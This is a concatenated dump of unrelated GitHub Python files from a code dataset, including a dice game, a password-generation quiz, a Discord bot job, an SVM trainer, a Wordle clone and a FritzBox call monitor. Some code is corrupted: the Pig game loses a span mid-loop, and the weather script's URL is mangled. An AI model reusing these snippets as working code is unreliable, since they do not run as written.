print(\"\\nCMP_SENT_LIST\\n{}\".format(cmp_sent_list))\n\n self.response_data['regular'] = cmp_sent_list\n\n return self.response_data\n except:\n logging.exception('')\n return self.response_data\n","repo_name":"rinigo/therapy_chatbot_jullie","sub_path":"core/nlp/response_generator/product/cct/cmp_response_generator.py","file_name":"cmp_response_generator.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"30537300227","text":"from ai import AI\nfrom player import Player\nfrom score import Score\nfrom dice import Dice\nimport random\n\nclass Game:\n\tdef __init__(self):\n\t\tself.player_name_dic={}\n\t\tself.player_list=[]\n\t\tself.target_score=None\n\t\tself.has_AI=None\n\n\tdef main_menu(self):\n\t\tplayer_num=int(input(\"please enter how many human players there are, your human players will take turns playing the game in the order you input them now: \"))\n\t\tself.has_AI=input(\"please enter whether you want an AI player, enter 'y' for yes and 'n' for no, if you have an AI player, the AI player will always take the first turn to play the game: \")\n\t\tself.target_score=int(input(\"please enter whether your game's target score: \"))\n\t\n\t\t\n\t\tself.has_AI=self.has_AI.lower()\n\t\tself.add_player(player_num)\n\t\tif (self.has_AI!='y' and self.has_AI!='n'):\n\t\t\tprint (\"you enter the wrong input, please reenter:\")\n\t\t\treturn self.main_menu()\n\t\telif (self.has_AI=='y'):\n\t\t\tself.add_AI()\n\n\n\n\n\tdef add_player(self, num_players):\n\t\tplayer_count=0\n\n\t\twhile(player_count=self.target_score:\n\t\t\tprint (\"Congratulations! Player \"+player_name+\" is the winner!\")\n\t\t\treturn True\n\n\t\telse:\n\t\t\treturn False\n\n\n\n\n\n\n\n\npig_game=Game()\npig_game.main_menu()\n\n\nhum_players_count=len(pig_game.player_list)\nhum_player_num=0\nplayer_name=pig_game.player_list[hum_player_num].name\ndid_you_win=pig_game.win_or_not(player_name)\nwhile (did_you_win!=True):\n\tplayer_name=pig_game.player_list[hum_player_num].name\n\tprint (\"Player \"+player_name+\" your turn has begun, your score for first roll of the turn is : \")\n\tturn_score=pig_game.each_turn(player_name,1)\n\tprint (\"Player \"+player_name+\" , your score for this turn is: \"+str(turn_score))\n\tpig_game.player_list[hum_player_num].player_score.add()\n\tpig_game.player_list[hum_player_num].player_score.reset_turn_0()\n\ttotal_score=pig_game.player_list[hum_player_num].player_score.total\n\tprint (\"Player \"+player_name+\" , your total score so far is: \"+str(total_score))\n\tdid_you_win=pig_game.win_or_not(player_name)\n\tif hum_player_num==hum_players_count-1:\n\t\thum_player_num=0\n\telse:\n\t\thum_player_num+=1\n\n\t\n\n\n\n\n\t\n\n\n\n\n\n","repo_name":"odelva/Python_Arithmetics_Pbs","sub_path":"PIG/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4371839785","text":"# Quiz) 사이트별로 비밀번호를 만들어주는 프로그램을 작성하시오.\n\n# 예) http://naver.com\n# 규칙 1 : http:// 부분은 제외 => naver.com \n# 규칙 2 : 처음 만나는 점(.) 이후 부분은 제외 => naver\n# 규칙 3 : 남은 글자 중 처음 세자리 + 글자 갯수 + 글자 내 'e' 갯수 + \"!\" 로 구성\n\n# 예) 생성된 비밀번호 : nav51!\n\nnaver = \"http://naver.com\"\ngoogle = \"http://google.com\"\ndaum = \"http://daum.net\"\n\npw1 = naver.replace(\"http://\", \"\")\npw1 = pw1[:pw1.index(\".\")]\npw1 = pw1[:3] + str(len(pw1)) + str(pw1.count(\"e\")) + \"!\"\nprint(\"{}의 비밀번호는 {}입니다\".format(naver, pw1))\n\npw1 = google[7:]\npw1 = pw1[:pw1.index(\".\")]\npw1 = pw1[:3] + str(len(pw1)) + str(pw1.count(\"e\")) + \"!\"\nprint(\"{}의 비밀번호는 {}입니다\".format(google, pw1))\n\npw1 = daum[7:]\npw1 = pw1[:pw1.index(\".\")]\npw1 = pw1[:3] + str(len(pw1)) + str(pw1.count(\"e\")) + \"!\"\nprint(\"{}의 비밀번호는 {}입니다\".format(daum, pw1))","repo_name":"Tinarago/Python_Study","sub_path":"PasswordCreater/password_creater.py","file_name":"password_creater.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26079625988","text":"import os\n\nfrom dotenv import load_dotenv\nfrom sqlalchemy.orm import Session\n\nfrom mmobot.db import initialize_engine\nfrom mmobot.db.models import Player\n\n\nload_dotenv()\nAFTERLIFE_CHANNEL_ID = os.getenv('AFTERLIFE_CHANNEL_ID')\nengine = initialize_engine()\n\n\ndef clear_inventory(player):\n for item in player.inventory:\n item.drop_into_zone(player.zone)\n player.inventory_weight = 0\n\n\nasync def kill_player(player_discord_id, client):\n '''\n Checks if the given player is incapacitated (hp = 0 or satiety = 0).\n If so, this job was triggered 2 minutes from when they were first incapacitated,\n so this job will kill the player by doing the following:\n 1. Set their is_active to False, and ensure they are not already dead\n 2. Make an announcement in their channel that they are dead\n 3. Move their location from the zone to the afterlife\n '''\n print('Killing the player')\n with Session(engine) as session:\n player = Player.select_with_discord_id(player_discord_id)\n if player is None:\n return\n if player.hp > 0:\n return\n user = client.get_user(player_discord_id)\n\n current_channel = await client.fetch_channel(player.zone.channel_id)\n await current_channel.set_permissions(user, read_messages=False, send_messages=False)\n await current_channel.send(f'{player.name} is dead')\n\n afterlife_channel = await client.fetch_channel(AFTERLIFE_CHANNEL_ID)\n await afterlife_channel.set_permissions(user, read_messages=True, send_messages=True)\n await afterlife_channel.send(f'{player.name} has arrived')\n\n player.is_active = False\n clear_inventory(player)\n session.commit()\n","repo_name":"yehric2018/mmobot","sub_path":"src/mmobot/jobs/date/kill_player.py","file_name":"kill_player.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"18635981652","text":"# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen(\"http://stackoverflow.com/tags\")\nbsObj = BeautifulSoup(html, \"html.parser\")\n\n\n\n\nnameLi = bsObj.findAll(\"a\", {\"class\" : \"post-tag\"})\nnameList = bsObj.findAll(\"span\", {\"class\":\"item-multiplier-count\"})\n\ndictionary = {}\n\n\nli = 0\n\nwhile li < len(nameList):\n\tdictionary [nameLi[li]. getText()] = [nameList[li].getText()]\n\t#print(nameLi[li].getText() + nameList[li].getText())\n\tli = li + 1\n\nfor d in dictionary:\n\tprint(d, \"-\", dictionary[d])","repo_name":"maritza05/Nosql-Crawler","sub_path":"namesQuestions.py","file_name":"namesQuestions.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"4433136810","text":"import sys, itertools\nsys.stdin = open(\"블랙잭_input.txt\")\n\nN, M = map(int, input().split())\ncards = list(map(int, input().split()))\nans = 0\ncombs = list(itertools.combinations(cards, 3))\nfor comb in combs:\n tot = sum(comb)\n if tot > M: continue\n if tot == M:\n ans = tot\n break\n if ans < tot:\n ans = tot\nprint(ans)","repo_name":"yoonwoo123/Algorithm","sub_path":"200225백준/블랙잭.py","file_name":"블랙잭.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17635568038","text":"'''\nDescription: \nversion: \nAuthor: Data Designer\nDate: 2021-03-14 11:11:08\nLastEditors: Data Designer\nLastEditTime: 2021-03-14 11:58:01\n'''\n#\n# @lc app=leetcode.cn id=63 lang=python3\n#\n# [63] 不同路径 II\n#\n\n# @lc code=start\nclass Solution:\n def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:\n m = len(obstacleGrid) # row\n n = len(obstacleGrid[0]) # column\n dp = [[0 for i in range(n)] for j in range(m)]\n # 特例\n if obstacleGrid[0][0] == 1:\n return 0\n dp[0][0] = 1\n for i in range(1,m):\n # dp[i][0] = 1 万一障碍物在这一行就不行了\n if obstacleGrid[i][0]!=1:\n dp[i][0] = dp[i-1][0]\n for i in range(1,n):\n if obstacleGrid[0][i] !=1: \n dp[0][i] = dp[0][i-1]\n for i in range(1,m):\n for j in range(1,n):\n if obstacleGrid[i][j] ==1:\n dp[i][j] = 0\n else:\n dp[i][j] = dp[i-1][j] + dp[i][j-1]\n return dp[-1][-1]\n# @lc code=end\n\n","repo_name":"Data-Designer/Leetcode-Travel","sub_path":"leetcode/63.不同路径-ii.py","file_name":"63.不同路径-ii.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74078623768","text":"\nfrom nltk.translate.bleu_score import sentence_bleu\nimport glob\nfrom sentence_transformers import SentenceTransformer, util\nimport gensim.downloader as api\nimport numpy as np\n\n\nmodel = SentenceTransformer('all-MiniLM-L6-v2')\n\nNUMBER_OF_PARTITIONS = 10\nfilePatterns = [\"./data/HateEval/partition_{}/hate_tweet_*.ann\".format(partition_num) for partition_num in range(1, NUMBER_OF_PARTITIONS + 1)]\n\n\ndef delete_unwanted_chars(text):\n return text.replace(\"\\n\", \"\").replace(\"\\t\", \"\").replace(\".\", \"\").replace(\",\", \"\").replace(\"!\", \"\").replace(\"#\", \"\").replace('“', '\"').replace('”', '\"').replace('…', '').replace(\"’\", \"\").replace(\"–\", \" \").replace(\"‘\", \"\").replace(\"—\", \"\").replace(\"·\", \"\")\n\n\ndef get_counter_narratives_map(filePatterns):\n positions = {\"CounterNarrativeA\": 0, \"CounterNarrativeB\": 1, \"CounterNarrativeC\": 2, \"CounterNarrativeD\": 3}\n\n counter_narratives = {}\n for filePattern in filePatterns:\n for f in glob.glob(filePattern):\n narrative_keys = [\"\", \"\", \"\", \"\"]\n cns = [\"\", \"\", \"\", \"\"]\n annotations = open(f, 'r')\n tweet = open(f.replace(\".ann\", \".txt\"), 'r')\n tweet_text = delete_unwanted_chars(tweet.read())\n for idx, word in enumerate(annotations):\n ann = word.replace(\"\\n\", \"\").split(\"\\t\")\n if len(ann) > 1:\n current_component = ann[1].strip()\n for k in positions:\n v = positions[k]\n if current_component.startswith(k):\n narrative_keys[v] = ann[0]\n annotations = open(f, 'r')\n for idx, word in enumerate(annotations):\n ann = word.replace(\"\\n\", \"\").split(\"\\t\")\n if len(ann) > 1:\n current_component = ann[1].split()\n if current_component[0].strip() == \"AnnotatorNotes\":\n for idx, key in enumerate(narrative_keys):\n if current_component[1].strip() == key:\n cns[idx] = ann[2].strip()\n dicckey = f.replace(\"./data/HateEval/partition_\", '').replace(\"/hate_tweet_\", \"-\").replace(\".ann\", \"\")\n counter_narratives[dicckey] = cns\n return counter_narratives\n\n\ndef evaluate_with_BLEU(cn, ground_truth):\n print(sentence_bleu(ground_truth, cn))\n\ndef evaluate_with_sentence_embeddings(cn, ground_truth):\n embeddings_truth = model.encode(ground_truth)\n embeddings_cn = model.encode([cn])\n cosine_scores = util.cos_sim(embeddings_cn, embeddings_truth)\n print(cosine_scores)\n\ndef evaluate_with_word_embeddings(cn, ground_truth):\n glove_vector = api.load('glove-twitter-200')\n cn_words = [word for word in cn.split() if word in glove_vector]\n word_embeddings_cn = np.mean(glove_vector[cn_words], axis=0)\n\n word_embeddings_truth = []\n for truth_cn in ground_truth:\n words = [word for word in truth_cn.split() if word in glove_vector]\n word_embeddings_truth.append(np.mean(glove_vector[words], axis=0))\n cosine_scores = util.cos_sim(word_embeddings_cn, np.array(word_embeddings_truth))\n print(cosine_scores)\n\ndef evaluate_cn(tweet_number, cn):\n\tcn_map = get_counter_narratives_map(filePatterns)\n\n\tcns = cn_map[tweet_number]\n\tnot_empty_cns = []\n\tfor cnn in cns:\n\t\tif cnn != \"\":\n\t\t\tnot_empty_cns.append(cnn)\n\n\tevaluate_with_sentence_embeddings(cn, not_empty_cns)\n\tevaluate_with_word_embeddings(cn, not_empty_cns)\n\n\nevaluate_cn(\"1-8\", \"If the streets of the UK are like that is not because of immigrants but because of poverty. Don't blame those who don't have nothing\")","repo_name":"DamiFur/brat-annotations-argumentation-schemes","sub_path":"counter_narratives_evaluation.py","file_name":"counter_narratives_evaluation.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28830947322","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 20 19:37:47 2018\n\n@author: thayssilva\n\"\"\"\n\ndef RangeIntervals(first=1,last=100):\n for num in range (first,last+1):\n key= multiples(num)\n print (key)\n\ndef multiples(number):\n key =number\n if number%3==0:\n key= \"Three\"\n if number%5 ==0:\n key=\"ThreeFive\"\n elif number%5==0:\n key = \"Five\"\n return (key)","repo_name":"Thaysfsil/short_exercise","sub_path":"printMultiples.py","file_name":"printMultiples.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18299591857","text":"import pandas as pd\nimport os\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import train_test_split\nimport pickle\n\nBASE_PATH = os.path.join(os.getcwd() , \"dataset\")\ndf = None\ni = 0\nfor file_name in os.listdir(BASE_PATH):\n file_path = os.path.join(BASE_PATH , file_name)\n print(file_path)\n data_frame = pd.read_csv(file_path , header=None)\n data_frame.pop(178)\n data_frame.pop(0)\n dat = pd.DataFrame({'result': [i for k in range(data_frame.shape[1])]})\n data_frame = data_frame.join(dat)\n if not df is None :\n df = df.append(data_frame , ignore_index=True)\n else:\n df = data_frame\n i += 1\n\n\nscaler = StandardScaler()\ny = df.pop(\"result\")\nscalled_data = scaler.fit_transform(df)\n\nX_train, X_test, y_train, y_test = train_test_split(scalled_data , y, test_size = 0.20)\n\nsvclassifier = SVC(kernel='linear')\nsvclassifier.fit(X_train, y_train)\ny_pred = svclassifier.predict(X_test)\nprint(confusion_matrix(y_test,y_pred))\nprint(classification_report(y_test,y_pred))\npickle.dump(svclassifier , open(\"classifier.pkl\" , 'wb'))\npickle.dump(scaler , open(\"scaler.pkl\" , 'wb'))","repo_name":"thedesertm/leapmotion_training_svm","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24121160818","text":"from turtle import*\n\ns = Screen()\ns.setup(1000,700)\ncolors =[\"red\",\"orange\",\"green\",\"yellow\",\"blue\"]\npencolor(\"black\")\npensize(3)\nfor i in range(15,0,-1):\n penup()\n setpos(0,-20*i)\n pendown()\n fillcolor(colors[i%5])\n begin_fill()\n circle(20*i)\n end_fill()\n\nmainloop() ","repo_name":"Sumit0914/sumit","sub_path":"graphic_with_turtle/concentric_circles.py","file_name":"concentric_circles.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11112121676","text":"import cv2\r\nimport numpy as np\r\n\r\niu = cv2.imread(\"image/iu_201908_.png\")\r\niu_gray = cv2.cvtColor(iu, cv2.COLOR_RGB2GRAY)\r\n# print(iu_gray)\r\n\r\nH = int(iu.shape[0]/2)\r\nW = int(iu.shape[1]/2)\r\n\r\n\r\nc_size_g = np.zeros((300, 500), dtype=np.uint8)\r\nc_size_c = np.zeros((300, 500, 3), dtype=np.uint8)\r\n\r\nNH = int(c_size_c.shape[0]/2)\r\nNW = int(c_size_c.shape[1]/2)\r\n\r\ndef img_crop(ori, new):\r\n if len(ori.shape) == 2:\r\n for i in range(len(new)):\r\n for j in range(len(new[0])):\r\n new[i][j] = ori[i + H - NH][j + W - NW]\r\n\r\n elif len(ori.shape) == 3:\r\n for i in range(len(new)):\r\n for j in range(len(new[0])):\r\n for c in range(3):\r\n new[i][j][c] = ori[i + H - NH][j + W - NW][c]\r\n return new\r\n\r\ng = img_crop(iu_gray, c_size_g)\r\nh = img_crop(iu, c_size_c)\r\n\r\ncv2.imshow('ori', iu)\r\ncv2.imshow('gray', iu_gray)\r\ncv2.imshow('new_gray', g)\r\ncv2.imshow('new_color', h)\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()","repo_name":"sonyujin95/algorithm","sub_path":"OpenCV/center_crop.py","file_name":"center_crop.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25011739035","text":"'''\nWrite a program which accept number from user and print numbers till that number\nInput : 8\nOutput : 1 2 3 4 5 6 7 8 \n'''\n\ndef PrintNumbers(num):\n if(num<0):\n print(\"{} is not a positive number\".format(num));\n for i in range(1,num+1):\n print(i,end = \" \");\n\ndef main():\n no = int(input(\"Enter number: \"));\n PrintNumbers(no);\n\nif __name__ == \"__main__\":\n main();","repo_name":"Aditya-A-Pardeshi/Coding-Hands-On","sub_path":"4 Python_Programs/1 Problems on numbers/25_PrintNumbers_Till_SpecifiedNumber/Demo.py","file_name":"Demo.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5642211026","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom gameboard import *\nfrom keyboard import *\nfrom gamelogic import *\n\nclass App: \n def __init__(self, root):\n self.root = root\n self.root.geometry(\"360x640\")\n #self.root.resizable(0,0)\n self.keyboardObject = keyboard()\n self.gameObject = gameBoard() \n\n self.frameTop = tk.Frame(self.root, bg=\"#121214\")\n self.frameTop.pack(side=\"top\", fill=tk.BOTH, expand=1) \n tk.Label(self.frameTop,text = \"\", width = 100, bg=\"#121214\").grid(column = 1, row = 0, columnspan = 18)\n tk.Button(self.frameTop, text = \"New Word\", bg=\"grey\", width = 12,command=self.newWord).grid(column = 0, row = 0, columnspan = 3, sticky=\"ew\") \n self.gameObject.createGameboard(self.frameTop) \n \n self.frameBottom = tk.Frame(self.root, bg=\"#121214\")\n self.frameBottom.pack(side=\"bottom\", fill=tk.BOTH, expand=1)\n self.keyboardObject.createKeyboard(self.keyPressed, self.frameBottom) \n \n def keyPressed(self, keyElem):\n key = keyElem.getKey() \n if(not(self.gameObject.getState() == GameStates.WORDPICK)):\n return # we are either in win or loss state here \n if(key == 'ENTER'):\n if self.gameObject.enterButton():\n # ok the input was valid\n # update the keyboard letter colors\n states = self.gameObject.getKeyStates() # hey states are a dict with 'char' and UNKNOWN EXACT or CLOSE\n self.keyboardObject.updateKeyStates(states)\n if(self.gameObject.getState() == GameStates.WINNER):\n ret = messagebox.askquestion(\"You win!\",\"Another round?\")\n if ret == 'yes':\n self.newWord()\n else:\n quit()\n if(self.gameObject.getState() == GameStates.LOOSER):\n str = \"The answer was \" + self.gameObject.winword + \"\\nAnother round?\"\n ret = messagebox.askquestion(\"Cough...loser...cough!\", str)\n if ret == 'yes':\n self.newWord()\n else:\n quit()\n else:\n pass # we were not valid\n elif(key == 'Back'):\n self.gameObject.delChar()\n else: # it must be a letter\n self.gameObject.addChar(key) \n \n def newWord(self): # button handler\n self.gameObject.resetBoard() \n self.keyboardObject.resetLetters() \n \nroot = tk.Tk()\napp = App(root)\nroot.mainloop()","repo_name":"Philomath9/tkInter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72437105688","text":"import pandas as pd\n\n\ndef print_stage(stage_str):\n count = 100\n occupied_count = len(stage_str)\n separator_num = int((count - occupied_count) / 2)\n separator_str = \"=\" * separator_num\n print_str = f\"{separator_str}{stage_str}{separator_str}\"\n print(print_str)\n\n\ndef epoch_time(start_time, end_time):\n elapsed_time = end_time - start_time\n elapsed_mins = int(elapsed_time / 60)\n elapsed_secs = int(elapsed_time - (elapsed_mins * 60))\n return elapsed_mins, elapsed_secs\n\n\ndef read_files(file_name, lines_constraint=None):\n results = []\n with open(file_name) as f:\n count = 0\n for line in f:\n results.append(line.replace(\"\\n\", \"\"))\n if lines_constraint:\n count += 1\n if count >= lines_constraint:\n break\n return results\n\n\ndef write_predictions(preds, split, name):\n with open(f\"./{name}.{split}.pred\", \"w\") as f:\n f.write(\"\\n\".join(preds))\n\n\ndef write_scores(scores, split, name):\n report = {}\n for k in [\"1\", \"2\", \"l\"]:\n for m in [\"precision\", \"recall\", \"f1\"]:\n report[f\"rouge-{k}-{m}\"] = [scores[f\"rouge-{k}-{m[0]}\"]]\n\n df = pd.DataFrame(report)\n df.to_csv(f\"./{name}_{split}_score.csv\", index=False)","repo_name":"daohuei/ucsc-nlp-unicorn","sub_path":"nlp_203/hw1/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14952634757","text":"import requests\n\n# Ask the user for a municipality name\nmunicipality = input(\"Enter a municipality name: \")\n\n# Make a GET request to the OpenWeatherMap API to fetch weather data\napi_key = \"YOUR_API_KEY_HERE\"\nurl = f\"https://api.openweathermap.org/data/2.5/weather?q=%7Bmunicipality%7D&appid=%7Bapi_key%7D\"\nresponse = requests.get(url)\n\n# Extract the temperature and weather description from the API response\ndata = response.json()\nkelvin_temp = data[\"main\"][\"temp\"]\ncelsius_temp = kelvin_temp - 273.15\ndescription = data[\"weather\"][0][\"description\"]\n\n# Print out the weather information to the user\nprint(f\"The weather in {municipality} is currently {description} with a temperature of {celsius_temp:.1f}°C.\")","repo_name":"maxkallio/pythonProjectss","sub_path":"12/12.2.py","file_name":"12.2.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31482956364","text":"import django_filters\nfrom django.db.models import Q\n\nfrom .models import *\n\nclass DHCPIpFilterSet(django_filters.FilterSet):\n q = django_filters.CharFilter(\n method='search',\n label='Search',\n )\n\n class Meta:\n model = DHCPIp\n fields = ['ip', 'description', 'type', 'mac']\n\n def search(self, queryset, ip, value):\n \"\"\"Perform the filtered search.\"\"\"\n if not value.strip():\n return queryset\n qs_filter = (\n Q(ip__icontains=value)\n )\n return queryset.filter(qs_filter)\n\n def type(self, queryset, type, value):\n \"\"\"Perform the filtered search.\"\"\"\n if not value.strip():\n return queryset\n qs_filter = (\n Q(type__icontains=value)\n )\n return queryset.filter(qs_filter)\n\nclass MACAddFilterSet(django_filters.FilterSet):\n q = django_filters.CharFilter(\n method='search',\n label='Search',\n )\n\n class Meta:\n model = MACAdd\n fields = ['MAC', 'description',]\n\n def search(self, queryset, MAC, value):\n \"\"\"Perform the filtered search.\"\"\"\n if not value.strip():\n return queryset\n qs_filter = (\n Q(MAC__icontains=value)\n )\n return queryset.filter(qs_filter)","repo_name":"YuryLoureiro/mixed_plugin","sub_path":"managedhcp/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21698379948","text":"# encoding: utf-8\n\nimport xbmc, xbmcaddon, xbmcvfs, xbmcgui\nimport socket\nimport os\nimport re\nimport datetime\nimport time\nimport json\nimport traceback\nimport hashlib\n\nfrom lib.PytzBox import PytzBox\nfrom lib.simple_gdata import SimpleGdataRequest\n\n# Script constants\n__addon__ = xbmcaddon.Addon()\n__addon_id__ = __addon__.getAddonInfo('id')\n__version__ = \"1\"\n\nKODIMONITOR = xbmc.Monitor()\n\ndef _(s):\n \"\"\"\n @param s: not localized String\n @type s: string\n \"\"\"\n translations = {\n 'leaving call': 30400,\n 'to %s (by %s)': 30401,\n 'incoming call': 30402,\n 'from %s': 30403,\n 'connected': 30404,\n 'to %s': 30405,\n 'call ended': 30406,\n 'duration: %sh': 30407,\n 'fritzbox unreachable': 30408,\n 'could not connect to fritzbox (%s).': 30409,\n 'unknown': 30410,\n 'fritzbox phonebook': 30411,\n 'fritzbox phonebookaccess failed': 30412\n }\n if s in translations:\n return __addon__.getLocalizedString(translations[s]) or s\n xbmc.log(\"FRITZBOX-CALLMONITOR-UNTRANSLATED: %s\" % s)\n return s\n\n\nclass FritzCallMonitor():\n def __init__(self):\n self.__pytzbox = None\n self.__fb_phonebook = None\n self.__auto_paused = False\n self.__auto_volume_lowered = False\n self.__connections = dict()\n self.__ring_time = False\n self.__gdata_request = None\n\n if __addon__.getSetting(\"Addressbook_Fritzadress\") == 'true':\n if self.__pytzbox is None:\n\n password = False\n if __addon__.getSetting(\"Addressbook_Fritzadress_Password\"):\n password = __addon__.getSetting(\"Addressbook_Fritzadress_Password\")\n\n if __addon__.getSetting(\"Addressbook_Fritzadress_Username\") and \\\n len(str(__addon__.getSetting(\"Addressbook_Fritzadress_Username\"))) > 0:\n username = __addon__.getSetting(\"Addressbook_Fritzadress_Username\")\n else:\n username = \"admin\"\n\n encrypt = True if __addon__.getSetting(\"Adressbook_Fritzadress_SSL\").upper() == 'TRUE' else False\n\n self.__pytzbox = PytzBox.PytzBox(password=password,\n username=username,\n host=__addon__.getSetting(\"Monitor_Address\"),\n encrypt=encrypt)\n\n if self.__fb_phonebook is None:\n try:\n if __addon__.getSetting(\"Addressbook_Fritzadress_book_all\") == 'true':\n self.__fb_phonebook = self.__pytzbox.getPhonebook(id=-1)\n else:\n self.__fb_phonebook = self.__pytzbox.getPhonebook(\n id=int(__addon__.getSetting(\"Addressbook_Fritzadress_book_id\")))\n xbmc.log(\"FRITZBOX-CALLMONITOR: loaded %d phone book entries\" % len(self.__fb_phonebook))\n except Exception as e:\n self.show_notification(_('fritzbox phonebook'),\n _('fritzbox phonebookaccess failed') + '\\r\\n%s' % e)\n xbmc.log('FRITZBOX-CALLMONITOR: ' + traceback.format_exc(), level=xbmc.LOGERROR)\n if isinstance(e, PytzBox.XMLValueError):\n xbmc.log(repr(e.content), level=xbmc.LOGERROR)\n # noinspection PyBroadException\n try:\n if isinstance(e, ValueError) and hasattr(e, 'content'):\n xbmc.log('FRITZBOX-CALLMONITOR: ' + str(e.content), level=xbmc.LOGERROR)\n xbmc.log('FRITZBOX-CALLMONITOR: ' + traceback.format_exc())\n except:\n pass\n\n if __addon__.getSetting(\"Addressbook_Google\") == 'true':\n self.__gdata_request = SimpleGdataRequest.SimpleGdataRequest()\n # noinspection PyBroadException\n try:\n self.__gdata_request.authorize(__addon__.getSetting(\"Addressbook_Google_Username\"),\n __addon__.getSetting(\"Addressbook_Google_Password\"), 'cp')\n except Exception:\n xbmc.log('FRITZBOX-CALLMONITOR: ' + traceback.format_exc())\n\n def error(*args, **kwargs):\n xbmc.log(\"FRITZBOX-CALLMONITOR: %s %s\" % (args, kwargs))\n\n class CallMonitorLine(dict):\n\n class UnexpectedCommandException(Exception):\n pass\n\n command = None\n\n def __init__(self, response, **kwargs):\n super(FritzCallMonitor.CallMonitorLine, self).__init__(**kwargs)\n self.__responses = dict()\n response = response.decode(\"utf-8\")\n response = response.split(';')\n\n # Example: '21.06.20 13:12:20;CALL;1;20;123456789;987654321#;SIP0;\\r\\n'\n self.command = response[1]\n if self.command == 'CALL':\n self['date'] = response[0]\n self['connection_id'] = int(response[2])\n self['extension'] = response[3]\n self['number_caller'] = response[4]\n self['number_called'] = response[5]\n self['sip'] = response[6]\n\n elif self.command == 'RING':\n self['date'] = response[0]\n self['connection_id'] = int(response[2])\n self['number_caller'] = response[3]\n self['number_called'] = response[4]\n self['sip'] = response[5]\n\n elif self.command == 'CONNECT':\n self['date'] = response[0]\n self['connection_id'] = int(response[2])\n self['extension'] = response[3]\n self['number'] = response[4]\n\n elif self.command == 'DISCONNECT':\n self['date'] = response[0]\n self['connection_id'] = int(response[2])\n self['duration'] = response[3]\n\n else:\n raise self.UnexpectedCommandException(self.command)\n\n if 'date' in self:\n #noinspection PyBroadException\n try:\n self['date'] = datetime.datetime.strptime(self['date'].strip(), '%d.%m.%y %H:%M:%S')\n except Exception:\n pass\n\n if 'duration' in self:\n #noinspection PyBroadException\n try:\n self['duration'] = datetime.timedelta(seconds=int(self['duration']))\n except Exception:\n pass\n\n def __getattr__(self, item):\n if item in self:\n return self[item]\n else:\n return False\n\n def __repr__(self):\n return self.command.lower() + ' event: ' + ', '.join([\"%s=%s\" % (key, self[key]) for key in list(self.keys())])\n\n @staticmethod\n def equal_numbers(a, b):\n\n a = a.strip()\n b = b.strip()\n\n a = re.sub('[^0-9]*', '', a)\n b = re.sub('[^0-9]*', '', b)\n\n if a.startswith('00'):\n a = a[4:]\n a = a.lstrip('0')\n\n if b.startswith('00'):\n b = b[4:]\n b = b.lstrip('0')\n\n if len(b) * 2 < len(a) or len(a) < len(b) / 2:\n return False\n\n a = a[-len(b):]\n b = b[-len(a):]\n\n return a == b\n\n def is_ignored_number(self, number, printout=False):\n if not isinstance(number, list):\n number = [number, ]\n for single_number in number:\n for ignored_number in re.findall(r'(\\d+)', __addon__.getSetting(\"Monitor_IgnoreNumbers\")):\n if self.equal_numbers(single_number, ignored_number):\n if printout:\n print(\"%s is ignored\" % single_number)\n return single_number\n return False\n\n def get_name_by_number(self, request_number):\n\n if not len(request_number):\n return _('unknown')\n\n if __addon__.getSetting(\"Addressbook_Fritzadress\") == 'true' and self.__fb_phonebook:\n if isinstance(self.__fb_phonebook, dict):\n for entry in self.__fb_phonebook:\n if 'numbers' in self.__fb_phonebook[entry]:\n for number in self.__fb_phonebook[entry]['numbers']:\n if 